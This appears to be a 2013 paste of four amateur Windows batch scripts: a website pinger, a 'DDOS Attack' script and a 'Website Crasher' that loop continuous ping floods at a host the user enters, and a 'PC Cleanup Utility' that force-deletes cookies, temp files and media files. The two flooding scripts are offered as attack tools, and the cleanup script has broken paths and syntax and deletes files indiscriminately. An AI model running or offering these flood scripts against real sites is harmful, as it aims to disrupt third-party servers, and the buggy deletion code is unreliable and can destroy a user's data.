
Batch Work

Oct 2nd, 2013
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  1. :A
  2. @echo off
  3. Title Website Pinger
  4. color 0e
  5. echo Enter the website you would like to ping
  6. set input=
  7. set /p input= Enter your Website here:
  8. if %input%==goto A if NOT B
  9. echo Processing Your request
  10. ping localhost>nul
  11. echo -------------------------------------------------------------------------------------
  12. echo If you do not clost this in 45 seconds you will go to **ENTER WEBSITE HERE**
  13. echo -------------------------------------------------------------------------------------
  14. ping localhost>nul
  15. echo This is the IP=
  16. ping %input%
  17. set input=
  18. set /p input= If you want to open this adress please enter the IP here:
  19. start iexplore.exe %input%
  20. set input2=
  21. set /p input2=
  22. if %input% exit goto exit
  23. ping localhost -n 45 >nul
  24. start iexplore.exe **ENTER WEBSITE HERE**
  25. exit
  26. :exit
  27. exit
  28. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  29. @echo off
  30. mode 67,16
  31. title DDOS Attack
  32. color 0a
  33. cls
  34. echo.
  36. echo DDOS With Batchfile
  38. echo.
  39. set /p x=Server-Target:
  40. echo.
  42. ping %x%
  44. @ping.exe -n 5 -w 1000 > nul
  45. goto Next
  46. :Next
  47. echo.
  48. echo.
  49. echo.
  50. set /p m=ip Host:
  51. echo.
  52. set /p n=Packet Size:
  53. echo.
  54. :DDOS
  55. color 0c
  56. echo Attacking Server %m%
  57. ping %m% -i %n% -t >nul
  58. goto DDOS
  59. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  60. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  62. ':A
  63. @echo off
  64. Title Website Crasher
  65. color 0e
  66. echo Enter the website you would like to crash
  67. set input=
  68. set /p input= Enter your Website here:
  69. if %input%==goto A if NOT B
  70. echo Processing Your request
  71. ping localhost>nul
  72. echo To end Crashing press CTRL + C
  73. ping localhost>nul
  74. cls
  75. echo ----------------------------------------------------------------------
  76. echo Now Crashing Website...DO NOT CLOSE THIS BOX!! PRESS CRTL + C TO END!!
  77. echo ----------------------------------------------------------------------
  78. ping %input% -t -l 1000
  79. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  82. @echo off
  83. title PC Cleanup Utility
  85. :menu
  86. cls
  87. echo --------------------------------------------------------------------------------
  88. echo PC Cleanup Utility
  89. echo --------------------------------------------------------------------------------
  90. echo.
  91. echo Select a tool
  92. echo =============
  93. echo.
  94. echo [1] Delete Internet Cookies
  95. echo [2] Delete Temporary Internet Files
  96. echo [3] Disk Cleanup
  97. echo [4] Disk Defragment
  98. echo [5] Exit
  99. echo.
  100. set /p op=Run:
  101. if %op%==1 goto 1
  102. if %op%==2 goto 2
  103. if %op%==3 goto 3
  104. if %op%==4 goto 4
  105. if %op%==5 goto exit
  106. goto error
  107. :1
  108. cls
  109. echo --------------------------------------------------------------------------------
  110. echo Delete Internet Cookies
  111. echo --------------------------------------------------------------------------------
  112. echo.
  113. echo Deleting Cookies...
  114. ping localhost -n 3 >nul
  115. del /f /q "%userprofile%\Cookies\*.*"
  116. cls
  117. echo --------------------------------------------------------------------------------
  118. echo Delete Internet Cookies
  119. echo --------------------------------------------------------------------------------
  120. echo.
  121. echo Cookies deleted.
  122. echo.
  123. echo Press any key to return to the menu. . .
  124. pause >nul
  125. goto menu
  126. :2
  127. cls
  128. echo --------------------------------------------------------------------------------
  129. echo Delete Temporary Internet Files
  130. echo --------------------------------------------------------------------------------
  131. echo.
  132. echo Deleting Temporary Files...
  133. ping localhost -n 3 >nul
  134. del /f /q "%userprofile%\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*"
  135. cls
  136. echo --------------------------------------------------------------------------------
  137. echo Delete Temporary Internet Files
  138. echo --------------------------------------------------------------------------------
  139. echo.
  140. echo Temporary Internet Files deleted.
  141. echo.
  142. echo Press any key to return to the menu. . .
  143. pause >nul
  144. goto menu
  145. :3
  146. cls
  147. echo --------------------------------------------------------------------------------
  148. echo Disk Cleanup
  149. echo --------------------------------------------------------------------------------
  150. echo.
  151. echo Running Disk Cleanup...
  152. ping localhost -n 3 >nul
  153. if exist "C:\WINDOWS\temp"del /f /q "C:WINDOWS\temp\*.*"
  154. if exist "C:\WINDOWS\tmp" del /f /q "C:\WINDOWS\tmp\*.*"
  155. if exist "C:\tmp" del /f /q "C:\tmp\*.*"
  156. if exist "C:\temp" del /f /q "C:\temp\*.*"
  157. if exist "%temp%" del /f /q "%temp%\*.*"
  158. if exist "%tmp%" del /f /q "%tmp%\*.*"
  159. if not exist "C:\WINDOWS\Users\*.*" goto skip
  160. if exist "C:\WINDOWS\Users\*.zip" del "C:\WINDOWS\Users\*.zip" /f /q
  161. if exist "C:\WINDOWS\Users\*.exe" del "C:\WINDOWS\Users\*.exe" /f /q
  162. if exist "C:\WINDOWS\Users\*.gif" del "C:\WINDOWS\Users\*.gif" /f /q
  163. if exist "C:\WINDOWS\Users\*.jpg" del "C:\WINDOWS\Users\*.jpg" /f /q
  164. if exist "C:\WINDOWS\Users\*.png" del "C:\WINDOWS\Users\*.png" /f /q
  165. if exist "C:\WINDOWS\Users\*.bmp" del "C:\WINDOWS\Users\*.bmp" /f /q
  166. if exist "C:\WINDOWS\Users\*.avi" del "C:\WINDOWS\Users\*.avi" /f /q
  167. if exist "C:\WINDOWS\Users\*.mpg" del "C:\WINDOWS\Users\*.mpg" /f /q
  168. if exist "C:\WINDOWS\Users\*.mpeg" del "C:\WINDOWS\Users\*.mpeg" /f /q
  169. if exist "C:\WINDOWS\Users\*.ra" del "C:\WINDOWS\Users\*.ra" /f /q
  170. if exist "C:\WINDOWS\Users\*.ram" del "C:\WINDOWS\Users\*.ram"/f /q
  171. if exist "C:\WINDOWS\Users\*.mp3" del "C:\WINDOWS\Users\*.mp3" /f /q
  172. if exist "C:\WINDOWS\Users\*.mov" del "C:\WINDOWS\Users\*.mov" /f /q
  173. if exist "C:\WINDOWS\Users\*.qt" del "C:\WINDOWS\Users\*.qt" /f /q
  174. if exist "C:\WINDOWS\Users\*.asf" del "C:\WINDOWS\Users\*.asf" /f /q
  175. :skip
  176. if not exist C:\WINDOWS\Users\Users\*.* goto skippy /f /q
  177. if exist C:\WINDOWS\Users\AppData\Temp\*.zip del C:\WINDOWS\Users\Users\*.zip /f /q
  178. if exist C:\WINDOWS\Users\AppData\Temp\*.exe del C:\WINDOWS\Users\Users\*.exe /f /q
  179. if exist C:\WINDOWS\Users\AppData\Temp\*.gif del C:\WINDOWS\Users\Users\*.gif /f /q
  180. if exist C:\WINDOWS\Users\AppData\Temp\*.jpg del C:\WINDOWS\Users\Users\*.jpg /f /q
  181. if exist C:\WINDOWS\Users\AppData\Temp\*.png del C:\WINDOWS\Users\Users\*.png /f /q
  182. if exist C:\WINDOWS\Users\AppData\Temp\*.bmp del C:\WINDOWS\Users\Users\*.bmp /f /q
  183. if exist C:\WINDOWS\Users\AppData\Temp\*.avi del C:\WINDOWS\Users\Users\*.avi /f /q
  184. if exist C:\WINDOWS\Users\AppData\Temp\*.mpg del C:\WINDOWS\Users\Users\*.mpg /f /q
  185. if exist C:\WINDOWS\Users\AppData\Temp\*.mpeg del C:\WINDOWS\Users\Users\*.mpeg /f /q
  186. if exist C:\WINDOWS\Users\AppData\Temp\*.ra del C:\WINDOWS\Users\Users\*.ra /f /q
  187. if exist C:\WINDOWS\Users\AppData\Temp\*.ram del C:\WINDOWS\Users\Users\*.ram /f /q
  188. if exist C:\WINDOWS\Users\AppData\Temp\*.mp3 del C:\WINDOWS\Users\Users\*.mp3 /f /q
  189. if exist C:\WINDOWS\Users\AppData\Temp\*.asf del C:\WINDOWS\Users\Users\*.asf /f /q
  190. if exist C:\WINDOWS\Users\AppData\Temp\*.qt del C:\WINDOWS\Users\Users\*.qt /f /q
  191. if exist C:\WINDOWS\Users\AppData\Temp\*.mov del C:\WINDOWS\Users\Users\*.mov /f /q
  192. :skippy
  193. if exist "C:\WINDOWS\ff*.tmp" del C:\WINDOWS\ff*.tmp /f /q
  194. if exist C:\WINDOWS\ShellIconCache del /f /q "C:\WINDOWS\ShellI~1\*.*"
  195. cls
  196. echo --------------------------------------------------------------------------------
  197. echo Disk Cleanup
  198. echo --------------------------------------------------------------------------------
  199. echo.
  200. echo Disk Cleanup successful!
  201. echo.
  202. pause
  203. goto menu
  204. :4
  205. cls
  206. echo --------------------------------------------------------------------------------
  207. echo Disk Defragment
  208. echo --------------------------------------------------------------------------------
  209. echo.
  210. echo Defragmenting hard disks...
  211. ping localhost -n 3 >nul
  212. defrag -c -v
  213. cls
  214. echo --------------------------------------------------------------------------------
  215. echo Disk Defragment
  216. echo --------------------------------------------------------------------------------
  217. echo.
  218. echo Disk Defrag successful!
  219. echo.
  220. pause
  221. goto menu
  222. :error
  223. cls
  224. echo Command not recognized.
  225. ping localhost -n 4 >nul
  226. goto menu
  227. :exit
  230. echo Thanks for using PC Cleanup Utility by Black_X
  231. ping >nul
  232. exit
  233. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
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